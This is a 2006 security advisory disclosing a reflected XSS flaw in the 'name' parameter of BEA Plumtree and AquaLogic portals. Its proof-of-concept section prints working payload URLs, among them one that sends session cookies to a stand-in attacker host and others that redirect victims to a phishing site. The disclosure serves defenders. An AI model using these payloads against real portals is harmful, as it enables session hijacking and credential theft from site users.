ProCheckUp Security Advisory 2006.12

`PR06-12: XSS on BEA Plumtree Foundation and AquaLogic Interaction portals  
  
  
Description:  
  
BEA Plumtree Foundation portal 6.0 and BEA AquaLogic Interaction 6.1 are   
vulnerable to a XSS vulnerability affecting the 'name' parameter which   
is submitted to the '/portal/server.pt' server-side script.  
  
Date found: 12th September 2006  
  
Vendor contacted: 18th May 2007  
  
Successfully tested on: BEA Plumtree Foundation 6.0.1.218452.  
  
BEA Systems have confirmed the following versions to be affected:  
  
BEA Plumtree Foundation 6.0 through service pack 1.  
BEA AquaLogic Interaction 6.1 through service pack 1.  
  
BEA Plumtree 5.0J.173033, 5.02, 5.03 and 5.4 are not affected by this issue.  
  
  
Severity: Medium-High  
  
  
Authors: Jan Fry and Adrian Pastor of ProCheckUp Ltd (www.procheckup.com)  
  
ProCheckUp thanks BEA Systems for their co-operation.  
  
Proof of concept:  
  
The following requests launch a JavaScript alert box on the user's web   
browser, simply to prove that is possible to run scripting code on the   
victim's web browser.  
  
Please note that '%22;}%3C/script%3E' is added at the beginning of every   
payload in order to make the overall HTML document syntactically   
correct, thus increasing the chance of the attack working on different   
web browser types:  
  
https://target-domain.foo/portal/server.pt?open=space&name=</SCRIPT><script>alert('CanCrossSiteScript')</script>  
https://target-domain.foo/portal/server.pt?open=space&name=%22;}%3C/script%3E%3Cscript%3Ealert('CanCrossSiteScript')%3C/script%3E%3C!--  
  
  
The following requests allow session hijacking through cookie theft:  
  
https://target-domain.foo/portal/server.pt?open=space&name=</SCRIPT><script>window.location="http://attackers-site.foo/grabber.php?c="%2bdocument.cookie</script>  
http://target-domain.foo/portal/server.pt?open=space&name=%22;}%3C/script%3E%3Cscript%3Ewindow.location="http://attackers-site.foo/grabber.php?c="%2bdocument.cookie%3C/script%3E%3C!--  
  
The following requests allow password theft by redirecting to a   
third-party 'spoof' site which would perform a phishing attack on the   
victim:  
  
https://target-domain.foo/portal/server.pt?open=space&name=</SCRIPT><script>window.location="http://phishers-site.foo"</script>  
http://target-domain.foo/portal/server.pt?open=space&name=%22;}%3C/script%3E%3Cscript%3Ewindow.location="http://phishers-site.foo%3C/script%3E%3C!--  
  
HTML injection through this XSS vulnerability is also possible. This   
allows advanced phishing attacks by inserting a HTML form within the   
context of the victim website.  
  
  
Consequences:  
  
Scripting code can be run within the security context of the target   
site. User accounts can be hijacked. Advanced phishing attacks can be   
launched.  
  
  
Note:  
  
This vulnerability could be considered a medium-high risk (rather than   
medium risk) in cases in which admin users are targeted, resulting in   
the attacker gaining administrative privileges on the target   
Plumtree/AquaLogic Portal.  
  
  
Fix: this issue will be addressed in the 6.5 release of AquaLogic   
Interaction.  
  
  
References:  
  
"ProCheckUp - Security Vulnerabilities"  
http://www.procheckup.com/Vulnerabilities.php  
  
BEA's BEA08-186.00 advisory:  
  
"Security Advisories and Notifications"  
http://dev2dev.bea.com/advisoriesnotifications/  
  
  
Legal:  
  
Copyright 2008 Procheckup Ltd. All rights reserved.  
  
Permission is granted for copying and circulating this Bulletin to the   
Internet community for the purpose of alerting them to problems, if and   
only if, the Bulletin is not edited or changed in any way, is attributed   
to Procheckup, and provided such reproduction and/or distribution is   
performed for non-commercial purposes.  
  
Any other use of this information is prohibited. Procheckup is not   
liable for any misuse of this information by any third party.  
`